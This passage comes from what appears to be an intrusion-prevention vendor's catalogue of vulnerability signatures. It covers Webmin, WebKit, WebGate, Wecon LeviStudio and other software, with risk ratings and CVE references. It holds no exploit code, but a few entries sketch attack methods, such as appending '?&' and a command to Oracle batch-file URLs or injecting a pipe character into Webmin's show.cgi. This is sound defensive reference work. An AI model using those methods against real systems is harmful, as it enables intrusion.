Description: Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions contains a buffer overflow vulnerability in fp30reg.dll. A remote attacker can execute arbitrary commands via a specially crafted registration request (URL) to the fp30reg.dll.
Situation: HTTP_CSU-FrontPage-Rad-Fp30reg-Access
References:
CVE-2001-0341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0341
BID-2906
http://www.securityfocus.com/bid/2906
OSVDB-577
http://www.osvdb.org/577
MS01-035
http://technet.microsoft.com/security/bulletin/MS01-035
Back to top

Web-Oracle-Batch-File-Cmd-Exec

About this vulnerability: Command execution using Oracle's batch files
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1638-5242
Platform: Windows NT 4.0
Software: Oracle Web Listener
Type: Malfunction
Description: Oracle Web Listener uses batch files that are stored in the /ows-bin/ directory by default. An attacker can run arbitrary commands on the server using these batch files by appending '?&' to the batch file name, followed by a command. The UNC paths can also be used to download and execute remote code. Executed programs will be run with the SYSTEM privileges.
Situation: HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments
References:
CVE-2000-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0169
BID-1053
http://www.securityfocus.com/bid/1053
Back to top

Web-Server-PHP-Injection

About this vulnerability: A PHP injection vulnerability in web server services
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: PHP Injection
Description: A PHP injection vulnerability in web server services which allows remote attackers to execute arbitrary code on the target system.
Situation: HTTP_CRL-Web-Server-PHP-Injection
Back to top

Web-Server-Side-Script-Disclosure

About this vulnerability: A configuration error in the web server
Risk: Low
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Configuration Error
Description: If the web server is incorrectly configured, it may expose server side scripts and includes instead of executing them properly. These server side scripts may reveal sensitive data, such as authentication data, and may expose the server for an additional attacks.
Situation: HTTP_CSH-Php-Scripting-In-Client-Request
HTTP_CSU-Php-Scripting-In-Client-Request
HTTP_SS-Php-Scripting-In-Server-Reply
HTTP_Asp-Scripting-In-Server-Reply
HTTP_Server-Side-Includes-In-Server-Reply
File-Text_Php-Scripting-In-Server-Reply
File-Text_Asp-Scripting-In-Server-Reply
File-Text_Server-Side-Includes-In-Server-Reply
Back to top

WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution

About this vulnerability: A vulnerability in WebBBS
Risk: Moderate
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebBBS
Type: Input Validation
Description: There exists a remote command execution vulnerability in WebBBS bulletin board application.
Situation: HTTP_CRL-WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution
References:
CVE-2002-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1993
Back to top

WebCalendar-Remote-Code-Injection

About this vulnerability: A WebCalendar Remote Code Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebCalendar
Type: Code Injection
Description: A vulnerability in WebCalendar, versions 1.2.4 and before, in the settings.php script which is meant for installation, which allows remote attackers to inject arbitrary code as www-data.
Situation: HTTP_CS-WebCalendar-Remote-Code-Injection
References:
CVE-2012-1495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1495
BID-53207
http://www.securityfocus.com/bid/53207
OSVDB-81329
http://www.osvdb.org/81329
Back to top

Webcrossing-WebX-HTTP-POST-Content-Length

About this vulnerability: A vulnerability in Webcrossing WebX
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Webcrossing WebX
Type: Input Validation
Description: A vulnerability in Webcrossing WebX
Back to top

Webgate-Embedded-Standard-Protocol-Multiple-Buffer-Overflows

About this vulnerability: Vulnerabilities in WebGate Embedded Standard Protocol (WESP)
Risk: Moderate
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGate eDVR Manager; WebGate Control Center; WebGate WebEyeAudio; WebGate WinRDS
Type: Buffer Overflow
Description: Multiple stack buffer overflow vulnerabilities exist in multiple products of WebGate. The vulnerabilities are due to insufficient input validation when processing parameters. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution within the context of the browser process.
Situation: File-Text_Webgate-eDVR-Manager-WESPMonitor-LoadImage-Buffer-Overflow
File-Text_Webgate-Multiple-Products-WESPSerialPortCtrl-Stack-Buffer-Overflow
References:
CVE-2015-2097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2097
OSVDB-118893
http://www.osvdb.org/118893
Back to top

Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WebGate Control Center
Risk: Moderate
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGate Control Center; WebGate eDVR Manager; WebGate WebEyeAudio; WebGate WinRDS
Type: Buffer Overflow
Description: Two stack buffer overflow vulnerabilities exist in WebGate Multiple Products. The vulnerabilities are due to insufficient input validation on the length of the parameter passed to the PlaySiteAllChannel() and StopSiteAllChannel() methods of the WESPPLAYBACK.WESPPlaybackCtrl control. A remote attacker could exploit these vulnerabilities by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the currently logged on user.
Situation: File-Text_Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow
References:
CVE-2015-2094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2094
OSVDB-118907
http://www.osvdb.org/118907
Back to top

Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WebGate Control Center
Risk: Low
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGate Control Center; WebGate eDVR Manager; WebGate WebEyeAudio; WebGate WinRDS
Type: Buffer Overflow
Description: A code execution vulnerability exists in WebGate WESPSDK that is shipped with multiple WebGate products. The vulnerability is due to a stack buffer overflow in the TCPDiscovery() and TCPDiscovery2() methods of the WESPDiscovery.WESPDiscoveryCtrl ActiveX control. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.
Situation: File-Text_Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow
References:
CVE-2015-2100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2100
OSVDB-118891
http://www.osvdb.org/118891
Back to top

WebGrabber-ActiveX-Control-Buffer-Overflow

About this vulnerability: A WebGrabber ActiveX Control Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: WebGrabber
Type: Buffer Overflow
Description: A buffer overflow vulnerability in WebGrabber, version 3.8.2.0, which allows remote attackers to execute arbitrary code via a long string to the GetStatus() method.
Situation: File-Text_WebGrabber-ActiveX-Control-Buffer-Overflow
References:
OSVDB-64579
http://www.osvdb.org/64579
Back to top

Webkit-getImageData-Buffer-Overflow-CVE-2018-12293

About this vulnerability: A vulnerability in WebKit
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Webkit
Type: Buffer Overflow
Description: WebKitGTK+ versions prior to 2.20.3 and WPE WebKit versions prior to 2.20.1 contain a heap buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.
Situation: File-Text_Webkit-getImageData-Buffer-Overflow-CVE-2018-12293
References:
CVE-2018-12293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12293
Back to top

Webkit-Object-Outline-Memory-Corruption

About this vulnerability: A vulnerability in Webkit HTML rendering engine
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari; Chrome
Type: Malfunction
Description: There is a memory corruption vulnerability in Webkit, the HTML rendering engine used in Apple's Safari and Google's Chrome web browsers. The vulnerability is due to memory corruption during the rendering of HTML object outlines. This vulnerability may be exploited by enticing a user to open a specially crafted web page. Exploitation will result in memory corruption which may crash the browser or could lead to arbitrary code execution.
Situation: HTTP_SS-Webkit-Object-Outline-Memory-Corruption
File-Text_Webkit-Object-Outline-Memory-Corruption
References:
CVE-2010-1813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1813
BID-43078
http://www.securityfocus.com/bid/43078
Back to top

Webkit-Use-After-Free-CVE-2017-7042

About this vulnerability: A vulnerability in WebKit
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Webkit
Type: Malfunction
Description: A use-after-free vulnerability leading to arbitrary code execution or a denial of service condition has been reported in WebKit. iOS before 10.3.3, Safari before 10.1.2, iCloud on Windows before 6.2.2, iTunes on Windows before 12.6.2, and tvOS before 10.2.2 are affected. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.
Situation: File-Text_Webkit-Use-After-Free-CVE-2017-7042
References:
CVE-2017-7042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7042
Back to top

WebLog-Expert-Denial-of-Service-CVE-2018-7582

About this vulnerability: A vulnerability in WebLog Expert Web Server
Risk: High
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Generic
Software: WebLog Expert
Type: Malfunction
Description: There exists a denial of service vulnerability in WebLog Expert Web Server. The vulnerability is due to improper handling of long HTTP Accept headers.
Situation: HTTP_CSH-WebLog-Expert-Denial-of-Service-CVE-2018-7582
References:
CVE-2018-7582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7582
Back to top

Webmin-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in Webmin
Risk: High
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Webmin
Type: Code Injection
Description: There exists a command injection vulnerability in Webmin. Successful exploitation can lead in remote code execution.
Situation: HTTP_CRL-Webmin-Command-Injection-Vulnerability
References:
CVE-2019-15107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
Back to top

Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Webmin Webmin
Risk: Moderate
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Webmin
Type: Input Validation
Description: Insufficient input validation the index.cgi of the Command-Shell module causes a cross-site scripting vulnerability in Webmin. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CS-Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting
References:
CVE-2020-8821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8821
Back to top

Webmin-Cross-Site-Scripting-CVE-2018-19191

About this vulnerability: A vulnerability in Webmin
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Webmin
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability has been reported in Webmin version 1.890.
Situation: HTTP_CRL-Webmin-Cross-Site-Scripting-CVE-2018-19191
References:
CVE-2018-19191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19191
Back to top

Webmin-File-Manager-RCE

About this vulnerability: A vulnerability in Webmin.
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Linux; Unix
Software: Webmin
Type: Input Validation
Description: A vulnerability in Webmin, version 1.984, which allow remote attackers to interact with file manager functionalities such as downloading files from remote URLs and changing file permissions, allowing remote code execution via a crafted .cgi file.
Situation: HTTP_CRL-Webmin-File-Manager-RCE
References:
CVE-2022-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0824
Back to top

Webmin-File-Parameter-Traversal

About this vulnerability: A Webmin File Parameter Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: Webmin
Type: Directory Traversal
Description: A vulnerability in Webmin, versions 1.590 and earlier, which allows remote attackers to read arbitrary files via a directory traversal in the file parameter to file/edit_html.cgi.
References:
CVE-2012-2983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2983
BID-55446
http://www.securityfocus.com/bid/55446
OSVDB-85247
http://www.osvdb.org/85247
Back to top

Webmin-Package-Updates-Remote-Command-Execution

About this vulnerability: A vulnerability in Webmin
Risk: High
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1499-5242
Platform: Generic
Software: Webmin
Type: Input Validation
Description: A vulnerability in Webmin, versions 1.910 and before, which allows remote attackers to execute arbitrary code through package-updates/update.cgi due to the lack of input validation. Also covers CVE-2022-36446.
Situation: HTTP_CRL-Webmin-Package-Updates-Remote-Command-Execution
References:
CVE-2019-12840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12840
Back to top

Webmin-Password-Change.cgi-Backdoor

About this vulnerability: A vulnerability in Webmin
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1825-5242
Platform: Generic
Software: Webmin
Type: Input Validation
Description: A vulnerability in Webmin, versions 1.890 - 1.920, which allows remote attackers to execute arbitrary code due to the lack of validation of user input.
References:
CVE-2019-15107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
Back to top

Webmin-Show.cgi-Command-Execution

About this vulnerability: A vulnerability in Webmin Webmin
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Webmin
Type: Input Validation
Description: There is a command execution vulnerability in Webmin. The vulnerability is due to insufficient input validation when processing requests sent to "show.cgi" page. A remote, authenticated attacker with access to File Manager module could exploit this vulnerability by sending crafted input to the vulnerable application by including a pipe character "|". Successful exploitation could result in command injecting and execution in the context of the vulnerable application, which is root.
Situation: HTTP_CRL-Webmin-Show.cgi-Command-Execution
References:
CVE-2012-2982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2982
Back to top

Webmin-Upload-Authenticated-RCE

About this vulnerability: A vulnerability in Webmin
Risk: High
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Webmin
Type: Input Validation
Description: A vulnerability in Webmin, versions 1.900 and before, which allows remote attackers to execute arbitrary code by uploading a crafted .cgi file via updown/upload.cgi.
Situation: HTTP_CS-Webmin-Upload-Authenticated-RCE
References:
CVE-2019-9624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9624
Back to top

Webmin_Arbitary_File_Disclosure

About this vulnerability: Arbitary file disclosure vulnerability in Webmin/Usermin
Risk: Moderate
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Webmin; Usermin
Type: Input Validation
Description: There is a file disclosure vulnerability in Webmin and Usermin. An attacker can retrieve files of his choice from the host system, including files that contain sensitive data such as usernames and passwords.
Situation: HTTP_CSU-Webmin-Arbitary-File-Disclosure
References:
CVE-2006-3392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
BID-18744
http://www.securityfocus.com/bid/18744
OSVDB-26772
http://www.osvdb.org/26772
Back to top

WebRTC-Heap-Buffer-Overflow-CVE-2022-2294

About this vulnerability: An attempt to exploit a vulnerability in WebRTC detected
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: Safari;Chrome
Type: Malfunction
Description: A heap buffer overflow has been reported in WebRTC. This issue affects Chrome versions before 103.0.5060.114 and Safari versions up to and including 15.5.
Situation: File-Text_WebRTC-Heap-Buffer-Overflow-CVE-2022-2294
References:
CVE-2022-2294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294
Back to top

Website-Admin-Console-Access

About this vulnerability: Website admin console access or access attempt
Risk: High
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress; phpMyAdmin; Joomla; MODx
Type: Malfunction
Description: Several websites and blogs have administrator consoles that allow the site owner to log in to the site and to manage the site's content. Content management systems such, such as WordPress, have default, well-known administrator consoles.
Situation: HTTP_CSU-MODx-Manager-Console-Access-Attempt
HTTP_CSU-Joomla-Administrator-Console-Access-Attempt
HTTP_CSU-Phpmyadmin-Console-Access-Attempt
HTTP_CSU-Wordpress-Admin-Console-Access-Attempt
Back to top

Webster-HTTP-Server-Buffer-Overflow

About this vulnerability: A Webster HTTP Server Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Webster
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Webster HTTP Server which allows remote attackers to execute arbitrary code via a long URL.
Situation: HTTP_CSU-Webster-HTTP-Server-Buffer-Overflow
References:
CVE-2002-2268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2268
BID-6289
http://www.securityfocus.com/bid/6289
OSVDB-44106
http://www.osvdb.org/44106
Back to top

Websvn-Search-Command-Injection

About this vulnerability: A vulnerability in WebSVN WebSVN
Risk: Moderate
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Generic
Software: WebSVN
Type: Input Validation
Description: Improper validation of parameters received by search.php causes a command njection vulnerability in WebSVN. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Websvn-Search-Command-Injection
References:
CVE-2021-32305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32305
Back to top

Webui-Mainfile.php-Arbitrary-Command-Injection

About this vulnerability: A vulnerability in WebUI WebUI
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebUI
Type: Input Validation
Description: An arbitrary command injection vulnerability exists in WebUI. The vulnerability is due to insufficient validation of multiple parameters in "mainfile.php" when handling HTTP requests. A remote, authenticated attacker can exploit this vulnerability by sending maliciously crafted input to the affected server. This can result in arbitrary command execution with the privileges of the web server process.
Situation: HTTP_CRL-Webui-Mainfile.php-Arbitrary-Command-Injection
References:
OSVDB-121619
http://www.osvdb.org/121619
Back to top

Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of XML files results in a heap buffer overflow in Wecon LeviStudio. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: File-TextId_Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow
Back to top

Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Insufficient validation of user-provided data results in a stack buffer overflow vulnerability in Wecon LeviStudio. As a result of a successful exploit, an attacker can execute arbitrary code on the target system.
Situation: File-TextId_Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Input Validation
Description: Improper parsing of the ComSet NETIPaddr attribute in XML LeviStudio project files causes a stack buffer overflow vulnerability in Wevon LeviStudio. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow
References:
CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537
Back to top

Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper XML attribute length validation causes a stack buffer overflow vulnerability in Wecon LeviStudio. A successful exploitation allows an attacker to run arbitrary code on the target.
Situation: File-TextId_Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow vulnerability in WECON LeviStudio DataLogTool. This vulnerability can be exploited by opening a maliciously crafted INI file in DataLogTool. Successful exploitation can lead in arbitrary code execution.
Situation: File-Text_Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow
References:
CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537
Back to top

Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudio DataLogTool
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: An stack based buffer overflow vulnerability in WECON LeviStudio DataLogTool, versions 1.8.56 and prior, which allows remote attackers to execute arbitrary code by sending a crafted .csv file, due to the improper validation of the length of user-supplied data prior to copying it to a fixed length stack based buffer.
Situation: File-Text_Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow
References:
CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537
Back to top

Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper parsing of XML szFilename attribute of the G_BMP element causes a stack buffer overflow in Wecon LeviStudio. A successful exploit may allow an attacker to execute code on the target system with administrator privileges.
Situation: File-TextId_Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-776-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper parsing of an XML HmiSetType attribute in project files causes a stack buffer overflow vulnerablity in Wecon LeviStudio. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the user.
Situation: File-TextId_Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Input Validation
Description: Improper parsing of XML InstallmentSet InstallmentTrigAddOpen attribute of LeviStudio project files causes a stack buffer overflow vulnerability in Wecon LeviStudio. A successful exploit allows an attacker to execute arbitrary coed on the target system.
Situation: File-TextId_Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow
References:
CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537
Back to top

Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Wecon LeviStudio which allows remote attackers to execute arbitrary code by sending a malicious G_Picture XML file, due to the improper parsing of the szFilename attribute of the MulStatus element.
Situation: File-TextId_Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in WECON LeviStudio. The vulnerability is due to improper parsing of XML PLC Type attribute of LeviStudio project files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted project file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user process.
Situation: File-TextId_Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow
Back to top

Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper XML parsing in Wecon LeviStudio causes a heap buffer overflow vulnerability which can be exploited to gain the ability to execute arbitrary code on the target.
Situation: File-TextId_Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow
Back to top

Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There has been reported a stack buffer overflow in Wecon LeviStudio. Successful exploitation could lead in arbitrary code execution.
Situation: File-TextId_Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow
Back to top

Wecon-Levistudio-String-Content-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudio
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper parsing of XML structures results in a buffer overflow vulnerability in Wecon LeviStudio. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-TextId_Wecon-Levistudio-String-Content-Heap-Buffer-Overflow
Back to top

Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1474-5242
Last changed: sgpkg-ips-1474-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow the attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow
References:
CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138
Back to top

Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1444-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow
References:
CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138
Back to top

Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow
References:
CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138
Back to top

Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudioU
Risk: High
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in WECON LeviStudioU which allows remote attackers to execute arbitrary code due to the insufficient validation of the length of user-supplied data in the Alarm tag of UMP files.
Situation: File-TextId_Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow
Back to top

Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1490-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
